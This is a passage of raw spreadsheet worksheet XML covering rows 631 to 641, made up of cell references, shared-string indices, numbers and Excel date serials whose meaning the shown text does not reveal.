      <c r="B631" t="s">
        <v>4994</v>
      </c>
      <c r="C631" t="s">
        <v>157</v>
      </c>
      <c r="D631" t="s">
        <v>4995</v>
      </c>
      <c r="E631" t="s">
        <v>944</v>
      </c>
      <c r="F631" t="s">
        <v>2105</v>
      </c>
      <c r="G631" s="1">
        <v>43922</v>
      </c>
      <c r="H631">
        <v>782</v>
      </c>
      <c r="I631">
        <v>782</v>
      </c>
      <c r="J631">
        <v>2</v>
      </c>
      <c r="K631">
        <v>0</v>
      </c>
      <c r="L631">
        <v>5</v>
      </c>
      <c r="M631">
        <v>0</v>
      </c>
      <c r="N631">
        <v>0</v>
      </c>
      <c r="O631">
        <v>0</v>
      </c>
      <c r="P631">
        <v>7</v>
      </c>
      <c r="Q631">
        <v>20</v>
      </c>
      <c r="R631">
        <v>22</v>
      </c>
      <c r="S631">
        <v>6</v>
      </c>
      <c r="T631">
        <v>1</v>
      </c>
      <c r="U631">
        <v>2000000</v>
      </c>
      <c r="V631">
        <v>0</v>
      </c>
      <c r="W631">
        <v>35000</v>
      </c>
      <c r="X631">
        <v>0</v>
      </c>
      <c r="Y631">
        <v>0</v>
      </c>
      <c r="Z631">
        <v>0</v>
      </c>
      <c r="AA631">
        <v>4000</v>
      </c>
      <c r="AB631">
        <v>500</v>
      </c>
      <c r="AC631">
        <v>2000</v>
      </c>
      <c r="AD631">
        <v>3000</v>
      </c>
      <c r="AE631">
        <v>5000000</v>
      </c>
      <c r="AF631" t="s">
        <v>4996</v>
      </c>
      <c r="AG631">
        <v>68472</v>
      </c>
      <c r="AH631">
        <v>16</v>
      </c>
      <c r="AJ631">
        <v>237</v>
      </c>
      <c r="AK631" t="s">
        <v>377</v>
      </c>
      <c r="AL631" t="s">
        <v>378</v>
      </c>
      <c r="AM631" t="s">
        <v>4997</v>
      </c>
      <c r="AN631" t="s">
        <v>55</v>
      </c>
      <c r="AO631">
        <v>2008</v>
      </c>
      <c r="AP631" t="s">
        <v>4998</v>
      </c>
      <c r="AQ631" t="s">
        <v>4999</v>
      </c>
      <c r="AR631" t="s">
        <v>4996</v>
      </c>
      <c r="AS631" t="s">
        <v>71</v>
      </c>
      <c r="AT631" t="s">
        <v>58</v>
      </c>
      <c r="AU631">
        <v>6</v>
      </c>
      <c r="AV631">
        <v>1</v>
      </c>
      <c r="AW631">
        <v>15</v>
      </c>
      <c r="AX631">
        <v>3</v>
      </c>
      <c r="AY631">
        <v>18</v>
      </c>
      <c r="AZ631">
        <v>6</v>
      </c>
      <c r="BA631" t="s">
        <v>17168</v>
      </c>
      <c r="BB631">
        <v>0</v>
      </c>
      <c r="BC631">
        <v>0</v>
      </c>
      <c r="BD631" t="s">
        <v>10069</v>
      </c>
    </row>
    <row r="632" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A632">
        <v>2537</v>
      </c>
      <c r="B632" t="s">
        <v>5000</v>
      </c>
      <c r="C632" t="s">
        <v>74</v>
      </c>
      <c r="D632" t="s">
        <v>5001</v>
      </c>
      <c r="E632" t="s">
        <v>49</v>
      </c>
      <c r="F632" t="s">
        <v>1016</v>
      </c>
      <c r="G632" s="1">
        <v>43936</v>
      </c>
      <c r="H632">
        <v>786</v>
      </c>
      <c r="I632">
        <v>786</v>
      </c>
      <c r="J632">
        <v>0</v>
      </c>
      <c r="K632">
        <v>1</v>
      </c>
      <c r="L632">
        <v>0</v>
      </c>
      <c r="M632">
        <v>0</v>
      </c>
      <c r="N632">
        <v>0</v>
      </c>
      <c r="O632">
        <v>0</v>
      </c>
      <c r="P632">
        <v>0</v>
      </c>
      <c r="Q632">
        <v>2</v>
      </c>
      <c r="R632">
        <v>0</v>
      </c>
      <c r="S632">
        <v>1</v>
      </c>
      <c r="T632">
        <v>0</v>
      </c>
      <c r="U632">
        <v>0</v>
      </c>
      <c r="V632">
        <v>4000</v>
      </c>
      <c r="W632">
        <v>0</v>
      </c>
      <c r="X632">
        <v>0</v>
      </c>
      <c r="Y632">
        <v>0</v>
      </c>
      <c r="Z632">
        <v>0</v>
      </c>
      <c r="AA632">
        <v>0</v>
      </c>
      <c r="AB632">
        <v>500</v>
      </c>
      <c r="AC632">
        <v>0</v>
      </c>
      <c r="AD632">
        <v>1</v>
      </c>
      <c r="AE632">
        <v>0</v>
      </c>
      <c r="AF632" t="s">
        <v>5002</v>
      </c>
      <c r="AG632">
        <v>52255</v>
      </c>
      <c r="AH632">
        <v>14</v>
      </c>
      <c r="AJ632">
        <v>216</v>
      </c>
      <c r="AK632" t="s">
        <v>5003</v>
      </c>
      <c r="AL632" t="s">
        <v>5004</v>
      </c>
      <c r="AM632" t="s">
        <v>5005</v>
      </c>
      <c r="AN632" t="s">
        <v>68</v>
      </c>
      <c r="AO632">
        <v>2008</v>
      </c>
      <c r="AP632">
        <v>81909922660</v>
      </c>
      <c r="AQ632" t="s">
        <v>4801</v>
      </c>
      <c r="AR632" t="s">
        <v>5006</v>
      </c>
      <c r="AU632">
        <v>0</v>
      </c>
      <c r="AV632">
        <v>0</v>
      </c>
      <c r="AW632">
        <v>9</v>
      </c>
      <c r="AX632">
        <v>132</v>
      </c>
      <c r="AY632">
        <v>1</v>
      </c>
      <c r="AZ632">
        <v>0</v>
      </c>
      <c r="BA632" t="s">
        <v>17162</v>
      </c>
      <c r="BB632">
        <v>0</v>
      </c>
      <c r="BC632">
        <v>0</v>
      </c>
      <c r="BD632" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="633" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A633">
        <v>2555</v>
      </c>
      <c r="B633" t="s">
        <v>5007</v>
      </c>
      <c r="C633" t="s">
        <v>189</v>
      </c>
      <c r="D633" t="s">
        <v>5008</v>
      </c>
      <c r="E633" t="s">
        <v>111</v>
      </c>
      <c r="F633" t="s">
        <v>5009</v>
      </c>
      <c r="G633" s="1">
        <v>43948</v>
      </c>
      <c r="H633">
        <v>794</v>
      </c>
      <c r="I633">
        <v>794</v>
      </c>
      <c r="J633">
        <v>8</v>
      </c>
      <c r="K633">
        <v>3</v>
      </c>
      <c r="L633">
        <v>8</v>
      </c>
      <c r="M633">
        <v>0</v>
      </c>
      <c r="N633">
        <v>0</v>
      </c>
      <c r="O633">
        <v>0</v>
      </c>
      <c r="P633">
        <v>0</v>
      </c>
      <c r="Q633">
        <v>0</v>
      </c>
      <c r="R633">
        <v>20</v>
      </c>
      <c r="S633">
        <v>1</v>
      </c>
      <c r="T633">
        <v>1</v>
      </c>
      <c r="U633">
        <v>26000</v>
      </c>
      <c r="V633">
        <v>275000</v>
      </c>
      <c r="W633">
        <v>26000</v>
      </c>
      <c r="X633">
        <v>0</v>
      </c>
      <c r="Y633">
        <v>0</v>
      </c>
      <c r="Z633">
        <v>0</v>
      </c>
      <c r="AA633">
        <v>0</v>
      </c>
      <c r="AB633">
        <v>0</v>
      </c>
      <c r="AC633">
        <v>20000</v>
      </c>
      <c r="AD633">
        <v>1</v>
      </c>
      <c r="AE633">
        <v>10000</v>
      </c>
      <c r="AF633" t="s">
        <v>5010</v>
      </c>
      <c r="AG633">
        <v>97128</v>
      </c>
      <c r="AH633">
        <v>31</v>
      </c>
      <c r="AJ633">
        <v>461</v>
      </c>
      <c r="AK633" t="s">
        <v>1566</v>
      </c>
      <c r="AL633" t="s">
        <v>5011</v>
      </c>
      <c r="AM633" t="s">
        <v>5012</v>
      </c>
      <c r="AN633" t="s">
        <v>55</v>
      </c>
      <c r="AO633">
        <v>2006</v>
      </c>
      <c r="AP633" t="s">
        <v>5013</v>
      </c>
      <c r="AQ633" t="s">
        <v>5014</v>
      </c>
      <c r="AR633" t="s">
        <v>5015</v>
      </c>
      <c r="AS633" t="s">
        <v>71</v>
      </c>
      <c r="AT633" t="s">
        <v>58</v>
      </c>
      <c r="AU633">
        <v>22</v>
      </c>
      <c r="AV633">
        <v>2</v>
      </c>
      <c r="AW633">
        <v>33</v>
      </c>
      <c r="AX633">
        <v>2</v>
      </c>
      <c r="AY633">
        <v>11</v>
      </c>
      <c r="AZ633">
        <v>2</v>
      </c>
      <c r="BA633" t="s">
        <v>16755</v>
      </c>
      <c r="BB633" t="s">
        <v>14504</v>
      </c>
      <c r="BC633" t="s">
        <v>10010</v>
      </c>
      <c r="BD633" t="s">
        <v>10741</v>
      </c>
    </row>
    <row r="634" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A634">
        <v>2554</v>
      </c>
      <c r="B634" t="s">
        <v>5016</v>
      </c>
      <c r="C634" t="s">
        <v>189</v>
      </c>
      <c r="D634" t="s">
        <v>5017</v>
      </c>
      <c r="E634" t="s">
        <v>142</v>
      </c>
      <c r="F634" t="s">
        <v>2244</v>
      </c>
      <c r="G634" s="1">
        <v>43998</v>
      </c>
      <c r="H634">
        <v>812</v>
      </c>
      <c r="I634">
        <v>812</v>
      </c>
      <c r="J634">
        <v>1</v>
      </c>
      <c r="K634">
        <v>0</v>
      </c>
      <c r="L634">
        <v>1</v>
      </c>
      <c r="M634">
        <v>0</v>
      </c>
      <c r="N634">
        <v>0</v>
      </c>
      <c r="O634">
        <v>0</v>
      </c>
      <c r="P634">
        <v>0</v>
      </c>
      <c r="Q634">
        <v>0</v>
      </c>
      <c r="R634">
        <v>0</v>
      </c>
      <c r="S634">
        <v>1</v>
      </c>
      <c r="T634">
        <v>0</v>
      </c>
      <c r="U634">
        <v>200000</v>
      </c>
      <c r="V634">
        <v>0</v>
      </c>
      <c r="W634">
        <v>4000</v>
      </c>
      <c r="X634">
        <v>0</v>
      </c>
      <c r="Y634">
        <v>0</v>
      </c>
      <c r="Z634">
        <v>0</v>
      </c>
      <c r="AA634">
        <v>0</v>
      </c>
      <c r="AB634">
        <v>0</v>
      </c>
      <c r="AC634">
        <v>0</v>
      </c>
      <c r="AD634">
        <v>1</v>
      </c>
      <c r="AE634">
        <v>0</v>
      </c>
      <c r="AF634" t="s">
        <v>5018</v>
      </c>
      <c r="AG634">
        <v>97236</v>
      </c>
      <c r="AH634">
        <v>31</v>
      </c>
      <c r="AJ634">
        <v>461</v>
      </c>
      <c r="AK634" t="s">
        <v>1099</v>
      </c>
      <c r="AL634" t="s">
        <v>1100</v>
      </c>
      <c r="AM634" t="s">
        <v>5019</v>
      </c>
      <c r="AN634" t="s">
        <v>68</v>
      </c>
      <c r="AO634">
        <v>2007</v>
      </c>
      <c r="AP634" t="s">
        <v>5020</v>
      </c>
      <c r="AQ634" t="s">
        <v>5021</v>
      </c>
      <c r="AR634" t="s">
        <v>5022</v>
      </c>
      <c r="AU634">
        <v>0</v>
      </c>
      <c r="AV634">
        <v>0</v>
      </c>
      <c r="AW634">
        <v>17</v>
      </c>
      <c r="AX634">
        <v>25</v>
      </c>
      <c r="AY634">
        <v>3</v>
      </c>
      <c r="AZ634">
        <v>10</v>
      </c>
      <c r="BA634" t="s">
        <v>16613</v>
      </c>
      <c r="BB634" t="s">
        <v>15858</v>
      </c>
      <c r="BC634" t="s">
        <v>9981</v>
      </c>
      <c r="BD634">
        <v>0</v>
      </c>
    </row>
    <row r="635" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A635">
        <v>2236</v>
      </c>
      <c r="B635" t="s">
        <v>5023</v>
      </c>
      <c r="C635" t="s">
        <v>129</v>
      </c>
      <c r="D635" t="s">
        <v>5024</v>
      </c>
      <c r="E635" t="s">
        <v>49</v>
      </c>
      <c r="F635" t="s">
        <v>5025</v>
      </c>
      <c r="G635" s="1">
        <v>43881</v>
      </c>
      <c r="H635">
        <v>821</v>
      </c>
      <c r="I635">
        <v>821</v>
      </c>
      <c r="J635">
        <v>1</v>
      </c>
      <c r="K635">
        <v>0</v>
      </c>
      <c r="L635">
        <v>0</v>
      </c>
      <c r="M635">
        <v>4</v>
      </c>
      <c r="N635">
        <v>0</v>
      </c>
      <c r="O635">
        <v>0</v>
      </c>
      <c r="P635">
        <v>0</v>
      </c>
      <c r="Q635">
        <v>1</v>
      </c>
      <c r="R635">
        <v>40</v>
      </c>
      <c r="S635">
        <v>0</v>
      </c>
      <c r="T635">
        <v>1</v>
      </c>
      <c r="U635">
        <v>5000</v>
      </c>
      <c r="V635">
        <v>0</v>
      </c>
      <c r="W635">
        <v>0</v>
      </c>
      <c r="X635">
        <v>4000</v>
      </c>
      <c r="Y635">
        <v>0</v>
      </c>
      <c r="Z635">
        <v>0</v>
      </c>
      <c r="AA635">
        <v>0</v>
      </c>
      <c r="AB635">
        <v>3</v>
      </c>
      <c r="AC635">
        <v>40000</v>
      </c>
      <c r="AD635">
        <v>0</v>
      </c>
      <c r="AE635">
        <v>3000</v>
      </c>
      <c r="AF635" t="s">
        <v>497</v>
      </c>
      <c r="AG635">
        <v>15211</v>
      </c>
      <c r="AH635">
        <v>11</v>
      </c>
      <c r="AJ635">
        <v>268</v>
      </c>
      <c r="AK635" t="s">
        <v>252</v>
      </c>
      <c r="AL635" t="s">
        <v>5026</v>
      </c>
      <c r="AM635" t="s">
        <v>5027</v>
      </c>
      <c r="AN635" t="s">
        <v>68</v>
      </c>
      <c r="AO635">
        <v>2016</v>
      </c>
      <c r="AP635" t="s">
        <v>5028</v>
      </c>
      <c r="AQ635" t="s">
        <v>5029</v>
      </c>
      <c r="AR635" t="s">
        <v>5030</v>
      </c>
      <c r="AS635" t="s">
        <v>57</v>
      </c>
      <c r="AT635" t="s">
        <v>58</v>
      </c>
      <c r="AU635">
        <v>15</v>
      </c>
      <c r="AV635">
        <v>2</v>
      </c>
      <c r="AW635">
        <v>2</v>
      </c>
      <c r="AX635">
        <v>0</v>
      </c>
      <c r="AY635">
        <v>9</v>
      </c>
      <c r="AZ635">
        <v>4</v>
      </c>
      <c r="BA635" t="s">
        <v>17095</v>
      </c>
      <c r="BB635" t="s">
        <v>15779</v>
      </c>
      <c r="BC635" t="s">
        <v>9485</v>
      </c>
      <c r="BD635" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="636" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A636">
        <v>2242</v>
      </c>
      <c r="B636" t="s">
        <v>5031</v>
      </c>
      <c r="C636" t="s">
        <v>168</v>
      </c>
      <c r="D636" t="s">
        <v>5032</v>
      </c>
      <c r="E636" t="s">
        <v>49</v>
      </c>
      <c r="F636" t="s">
        <v>5033</v>
      </c>
      <c r="G636" s="1">
        <v>43896</v>
      </c>
      <c r="H636">
        <v>857</v>
      </c>
      <c r="I636">
        <v>857</v>
      </c>
      <c r="J636">
        <v>0</v>
      </c>
      <c r="K636">
        <v>0</v>
      </c>
      <c r="L636">
        <v>0</v>
      </c>
      <c r="M636">
        <v>0</v>
      </c>
      <c r="N636">
        <v>0</v>
      </c>
      <c r="O636">
        <v>0</v>
      </c>
      <c r="P636">
        <v>0</v>
      </c>
      <c r="Q636">
        <v>0</v>
      </c>
      <c r="R636">
        <v>0</v>
      </c>
      <c r="S636">
        <v>0</v>
      </c>
      <c r="T636">
        <v>1</v>
      </c>
      <c r="U636">
        <v>0</v>
      </c>
      <c r="V636">
        <v>0</v>
      </c>
      <c r="W636">
        <v>0</v>
      </c>
      <c r="X636">
        <v>0</v>
      </c>
      <c r="Y636">
        <v>0</v>
      </c>
      <c r="Z636">
        <v>0</v>
      </c>
      <c r="AA636">
        <v>0</v>
      </c>
      <c r="AB636">
        <v>0</v>
      </c>
      <c r="AC636">
        <v>0</v>
      </c>
      <c r="AD636">
        <v>0</v>
      </c>
      <c r="AE636">
        <v>20000</v>
      </c>
      <c r="AF636" t="s">
        <v>5034</v>
      </c>
      <c r="AG636">
        <v>17531</v>
      </c>
      <c r="AH636">
        <v>13</v>
      </c>
      <c r="AJ636">
        <v>176</v>
      </c>
      <c r="AK636" t="s">
        <v>1532</v>
      </c>
      <c r="AL636" t="s">
        <v>5035</v>
      </c>
      <c r="AM636" t="s">
        <v>5036</v>
      </c>
      <c r="AN636" t="s">
        <v>68</v>
      </c>
      <c r="AO636">
        <v>1996</v>
      </c>
      <c r="AP636" t="s">
        <v>5037</v>
      </c>
      <c r="AQ636" t="s">
        <v>5038</v>
      </c>
      <c r="AR636" t="s">
        <v>5034</v>
      </c>
      <c r="AS636" t="s">
        <v>553</v>
      </c>
      <c r="AT636" t="s">
        <v>58</v>
      </c>
      <c r="AU636">
        <v>40</v>
      </c>
      <c r="AV636">
        <v>1</v>
      </c>
      <c r="AW636">
        <v>3</v>
      </c>
      <c r="AX636">
        <v>0</v>
      </c>
      <c r="AY636">
        <v>17</v>
      </c>
      <c r="AZ636">
        <v>0</v>
      </c>
      <c r="BA636" t="s">
        <v>17097</v>
      </c>
      <c r="BB636" t="s">
        <v>15783</v>
      </c>
      <c r="BC636">
        <v>0</v>
      </c>
      <c r="BD636">
        <v>0</v>
      </c>
    </row>
    <row r="637" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A637">
        <v>2178</v>
      </c>
      <c r="B637" t="s">
        <v>5039</v>
      </c>
      <c r="C637" t="s">
        <v>157</v>
      </c>
      <c r="D637" t="s">
        <v>5040</v>
      </c>
      <c r="E637" t="s">
        <v>412</v>
      </c>
      <c r="F637" t="s">
        <v>5041</v>
      </c>
      <c r="G637" s="1">
        <v>43847</v>
      </c>
      <c r="H637">
        <v>875</v>
      </c>
      <c r="I637">
        <v>875</v>
      </c>
      <c r="J637">
        <v>2</v>
      </c>
      <c r="K637">
        <v>0</v>
      </c>
      <c r="L637">
        <v>2</v>
      </c>
      <c r="M637">
        <v>0</v>
      </c>
      <c r="N637">
        <v>0</v>
      </c>
      <c r="O637">
        <v>0</v>
      </c>
      <c r="P637">
        <v>0</v>
      </c>
      <c r="Q637">
        <v>6</v>
      </c>
      <c r="R637">
        <v>10</v>
      </c>
      <c r="S637">
        <v>0</v>
      </c>
      <c r="T637">
        <v>0</v>
      </c>
      <c r="U637">
        <v>25700</v>
      </c>
      <c r="V637">
        <v>0</v>
      </c>
      <c r="W637">
        <v>0</v>
      </c>
      <c r="X637">
        <v>0</v>
      </c>
      <c r="Y637">
        <v>0</v>
      </c>
      <c r="Z637">
        <v>0</v>
      </c>
      <c r="AA637">
        <v>0</v>
      </c>
      <c r="AB637">
        <v>450</v>
      </c>
      <c r="AC637">
        <v>1500</v>
      </c>
      <c r="AD637">
        <v>0</v>
      </c>
      <c r="AE637">
        <v>0</v>
      </c>
      <c r="AF637" t="s">
        <v>5042</v>
      </c>
      <c r="AG637">
        <v>62356</v>
      </c>
      <c r="AH637">
        <v>16</v>
      </c>
      <c r="AJ637">
        <v>250</v>
      </c>
      <c r="AK637" t="s">
        <v>1039</v>
      </c>
      <c r="AL637" t="s">
        <v>5043</v>
      </c>
      <c r="AM637" t="s">
        <v>5044</v>
      </c>
      <c r="AN637" t="s">
        <v>288</v>
      </c>
      <c r="AO637">
        <v>2019</v>
      </c>
      <c r="AP637">
        <v>622232881784</v>
      </c>
      <c r="AQ637" t="s">
        <v>5045</v>
      </c>
      <c r="AR637" t="s">
        <v>5042</v>
      </c>
      <c r="AS637" t="s">
        <v>71</v>
      </c>
      <c r="AT637" t="s">
        <v>58</v>
      </c>
      <c r="AU637">
        <v>0</v>
      </c>
      <c r="AV637">
        <v>0</v>
      </c>
      <c r="AW637">
        <v>0</v>
      </c>
      <c r="AX637">
        <v>0</v>
      </c>
      <c r="AY637">
        <v>11</v>
      </c>
      <c r="AZ637">
        <v>14</v>
      </c>
      <c r="BA637" t="s">
        <v>17080</v>
      </c>
      <c r="BB637" t="s">
        <v>15748</v>
      </c>
      <c r="BC637" t="s">
        <v>9475</v>
      </c>
      <c r="BD637">
        <v>0</v>
      </c>
    </row>
    <row r="638" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A638">
        <v>2560</v>
      </c>
      <c r="B638" t="s">
        <v>5046</v>
      </c>
      <c r="C638" t="s">
        <v>157</v>
      </c>
      <c r="D638" t="s">
        <v>5047</v>
      </c>
      <c r="E638" t="s">
        <v>142</v>
      </c>
      <c r="F638" t="s">
        <v>5048</v>
      </c>
      <c r="G638" s="1">
        <v>43938</v>
      </c>
      <c r="H638">
        <v>891</v>
      </c>
      <c r="I638">
        <v>891</v>
      </c>
      <c r="J638">
        <v>1</v>
      </c>
      <c r="K638">
        <v>0</v>
      </c>
      <c r="L638">
        <v>2</v>
      </c>
      <c r="M638">
        <v>1</v>
      </c>
      <c r="N638">
        <v>0</v>
      </c>
      <c r="O638">
        <v>0</v>
      </c>
      <c r="P638">
        <v>0</v>
      </c>
      <c r="Q638">
        <v>0</v>
      </c>
      <c r="R638">
        <v>0</v>
      </c>
      <c r="S638">
        <v>0</v>
      </c>
      <c r="T638">
        <v>1</v>
      </c>
      <c r="U638">
        <v>50000</v>
      </c>
      <c r="V638">
        <v>0</v>
      </c>
      <c r="W638">
        <v>1000</v>
      </c>
      <c r="X638">
        <v>0</v>
      </c>
      <c r="Y638">
        <v>0</v>
      </c>
      <c r="Z638">
        <v>0</v>
      </c>
      <c r="AA638">
        <v>0</v>
      </c>
      <c r="AB638">
        <v>0</v>
      </c>
      <c r="AC638">
        <v>0</v>
      </c>
      <c r="AD638">
        <v>0</v>
      </c>
      <c r="AE638">
        <v>3300</v>
      </c>
      <c r="AF638" t="s">
        <v>5049</v>
      </c>
      <c r="AG638">
        <v>61121</v>
      </c>
      <c r="AH638">
        <v>16</v>
      </c>
      <c r="AJ638">
        <v>252</v>
      </c>
      <c r="AK638" t="s">
        <v>387</v>
      </c>
      <c r="AL638" t="s">
        <v>388</v>
      </c>
      <c r="AM638" t="s">
        <v>5050</v>
      </c>
      <c r="AN638" t="s">
        <v>55</v>
      </c>
      <c r="AO638">
        <v>2002</v>
      </c>
      <c r="AP638" t="s">
        <v>5051</v>
      </c>
      <c r="AQ638" t="s">
        <v>5052</v>
      </c>
      <c r="AR638" t="s">
        <v>5049</v>
      </c>
      <c r="AS638" t="s">
        <v>71</v>
      </c>
      <c r="AT638" t="s">
        <v>58</v>
      </c>
      <c r="AU638">
        <v>25</v>
      </c>
      <c r="AV638">
        <v>1</v>
      </c>
      <c r="AW638">
        <v>0</v>
      </c>
      <c r="AX638">
        <v>400</v>
      </c>
      <c r="AY638">
        <v>10</v>
      </c>
      <c r="AZ638">
        <v>24</v>
      </c>
      <c r="BA638" t="s">
        <v>16693</v>
      </c>
      <c r="BB638">
        <v>0</v>
      </c>
      <c r="BC638">
        <v>0</v>
      </c>
      <c r="BD638" t="s">
        <v>10006</v>
      </c>
    </row>
    <row r="639" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A639">
        <v>2591</v>
      </c>
      <c r="B639" t="s">
        <v>4977</v>
      </c>
      <c r="C639" t="s">
        <v>157</v>
      </c>
      <c r="D639" t="s">
        <v>5053</v>
      </c>
      <c r="E639" t="s">
        <v>111</v>
      </c>
      <c r="F639" t="s">
        <v>5054</v>
      </c>
      <c r="G639" s="1">
        <v>44267</v>
      </c>
      <c r="H639">
        <v>893</v>
      </c>
      <c r="I639">
        <v>893</v>
      </c>
      <c r="J639">
        <v>1</v>
      </c>
      <c r="K639">
        <v>0</v>
      </c>
      <c r="L639">
        <v>0</v>
      </c>
      <c r="M639">
        <v>0</v>
      </c>
      <c r="N639">
        <v>0</v>
      </c>
      <c r="O639">
        <v>0</v>
      </c>
      <c r="P639">
        <v>0</v>
      </c>
      <c r="Q639">
        <v>0</v>
      </c>
      <c r="R639">
        <v>0</v>
      </c>
      <c r="S639">
        <v>0</v>
      </c>
      <c r="T639">
        <v>0</v>
      </c>
      <c r="U639">
        <v>500000</v>
      </c>
      <c r="V639">
        <v>0</v>
      </c>
      <c r="W639">
        <v>0</v>
      </c>
      <c r="X639">
        <v>0</v>
      </c>
      <c r="Y639">
        <v>0</v>
      </c>
      <c r="Z639">
        <v>0</v>
      </c>
      <c r="AA639">
        <v>0</v>
      </c>
      <c r="AB639">
        <v>0</v>
      </c>
      <c r="AC639">
        <v>0</v>
      </c>
      <c r="AD639">
        <v>0</v>
      </c>
      <c r="AE639">
        <v>0</v>
      </c>
      <c r="AF639" t="s">
        <v>4980</v>
      </c>
      <c r="AG639">
        <v>60216</v>
      </c>
      <c r="AH639">
        <v>16</v>
      </c>
      <c r="AJ639">
        <v>264</v>
      </c>
      <c r="AK639" t="s">
        <v>5055</v>
      </c>
      <c r="AL639" t="s">
        <v>5056</v>
      </c>
      <c r="AM639" t="s">
        <v>5057</v>
      </c>
      <c r="AN639" t="s">
        <v>68</v>
      </c>
      <c r="AO639">
        <v>2002</v>
      </c>
      <c r="AP639">
        <v>317534411</v>
      </c>
      <c r="AQ639" t="s">
        <v>5058</v>
      </c>
      <c r="AR639" t="s">
        <v>4985</v>
      </c>
      <c r="AS639" t="s">
        <v>187</v>
      </c>
      <c r="AT639" t="s">
        <v>72</v>
      </c>
      <c r="AU639">
        <v>25</v>
      </c>
      <c r="AV639">
        <v>1</v>
      </c>
      <c r="AW639">
        <v>0</v>
      </c>
      <c r="AX639">
        <v>0</v>
      </c>
      <c r="AY639">
        <v>14</v>
      </c>
      <c r="AZ639">
        <v>2</v>
      </c>
      <c r="BA639" t="s">
        <v>16790</v>
      </c>
      <c r="BB639" t="s">
        <v>15863</v>
      </c>
      <c r="BC639" t="s">
        <v>12072</v>
      </c>
      <c r="BD639">
        <v>0</v>
      </c>
    </row>
    <row r="640" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A640">
        <v>2297</v>
      </c>
      <c r="B640" t="s">
        <v>5059</v>
      </c>
      <c r="C640" t="s">
        <v>168</v>
      </c>
      <c r="D640" t="s">
        <v>5060</v>
      </c>
      <c r="E640" t="s">
        <v>49</v>
      </c>
      <c r="F640" t="s">
        <v>1016</v>
      </c>
      <c r="G640" s="1">
        <v>43846</v>
      </c>
      <c r="H640">
        <v>936</v>
      </c>
      <c r="I640">
        <v>936</v>
      </c>
      <c r="J640">
        <v>0</v>
      </c>
      <c r="K640">
        <v>1</v>
      </c>
      <c r="L640">
        <v>0</v>
      </c>
      <c r="M640">
        <v>0</v>
      </c>
      <c r="N640">
        <v>0</v>
      </c>
      <c r="O640">
        <v>0</v>
      </c>
      <c r="P640">
        <v>0</v>
      </c>
      <c r="Q640">
        <v>2</v>
      </c>
      <c r="R640">
        <v>0</v>
      </c>
      <c r="S640">
        <v>0</v>
      </c>
      <c r="T640">
        <v>0</v>
      </c>
      <c r="U640">
        <v>0</v>
      </c>
      <c r="V640">
        <v>2000</v>
      </c>
      <c r="W640">
        <v>0</v>
      </c>
      <c r="X640">
        <v>0</v>
      </c>
      <c r="Y640">
        <v>0</v>
      </c>
      <c r="Z640">
        <v>0</v>
      </c>
      <c r="AA640">
        <v>0</v>
      </c>
      <c r="AB640">
        <v>500</v>
      </c>
      <c r="AC640">
        <v>0</v>
      </c>
      <c r="AD640">
        <v>0</v>
      </c>
      <c r="AE640">
        <v>0</v>
      </c>
      <c r="AF640" t="s">
        <v>1348</v>
      </c>
      <c r="AG640">
        <v>45191</v>
      </c>
      <c r="AH640">
        <v>13</v>
      </c>
      <c r="AJ640">
        <v>169</v>
      </c>
      <c r="AK640" t="s">
        <v>5061</v>
      </c>
      <c r="AL640" t="s">
        <v>5062</v>
      </c>
      <c r="AM640" t="s">
        <v>5063</v>
      </c>
      <c r="AN640" t="s">
        <v>68</v>
      </c>
      <c r="AO640">
        <v>2007</v>
      </c>
      <c r="AP640">
        <v>87856036262</v>
      </c>
      <c r="AQ640" t="s">
        <v>5064</v>
      </c>
      <c r="AR640" t="s">
        <v>5065</v>
      </c>
      <c r="AU640">
        <v>0</v>
      </c>
      <c r="AV640">
        <v>0</v>
      </c>
      <c r="AW640">
        <v>5</v>
      </c>
      <c r="AX640">
        <v>62</v>
      </c>
      <c r="AY640">
        <v>3</v>
      </c>
      <c r="AZ640">
        <v>1</v>
      </c>
      <c r="BA640" t="s">
        <v>16644</v>
      </c>
      <c r="BB640" t="s">
        <v>15813</v>
      </c>
      <c r="BC640">
        <v>0</v>
      </c>
      <c r="BD640">
        <v>0</v>
      </c>
    </row>
    <row r="641" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A641">
        <v>2550</v>
      </c>
      <c r="B641" t="s">
        <v>5066</v>
      </c>
      <c r="C641" t="s">
        <v>790</v>
      </c>
      <c r="D641" t="s">
        <v>5067</v>
      </c>
      <c r="E641" t="s">
        <v>142</v>
      </c>
      <c r="F641" t="s">
        <v>5068</v>
      </c>
      <c r="G641" s="1">
        <v>43886</v>
      </c>
      <c r="H641">
        <v>946</v>
      </c>
      <c r="I641">
        <v>946</v>
      </c>
      <c r="J641">
        <v>1</v>
      </c>
      <c r="K641">
        <v>0</v>
      </c>
      <c r="L641">
        <v>2</v>
      </c>
      <c r="M641">
        <v>0</v>
      </c>
      <c r="N641">
        <v>0</v>
      </c>
      <c r="O641">
        <v>0</v>
      </c>
      <c r="P641">
        <v>0</v>
      </c>
      <c r="Q641">
        <v>4</v>
      </c>
      <c r="R641">
        <v>1</v>
      </c>
      <c r="S641">
        <v>0</v>
      </c>
      <c r="T641">
        <v>0</v>
      </c>
      <c r="U641">
        <v>100000</v>
      </c>
      <c r="V641">
        <v>0</v>
      </c>
      <c r="W641">
        <v>7000</v>
      </c>
      <c r="X641">
        <v>0</v>
      </c>
      <c r="Y641">
        <v>0</v>
      </c>
      <c r="Z641">
        <v>0</v>
      </c>
      <c r="AA641">
        <v>0</v>
      </c>
      <c r="AB641">
        <v>120</v>
      </c>
      <c r="AC641">
        <v>1000</v>
      </c>
      <c r="AD641">
        <v>0</v>
      </c>
      <c r="AE641">
        <v>0</v>
      </c>
      <c r="AF641" t="s">
        <v>5069</v>
      </c>
      <c r="AG641">
        <v>93123</v>
      </c>
      <c r="AH641">
        <v>27</v>
      </c>
      <c r="AJ641">
        <v>438</v>
      </c>
      <c r="AK641" t="s">
        <v>5070</v>
      </c>
      <c r="AL641" t="s">
        <v>5071</v>
      </c>
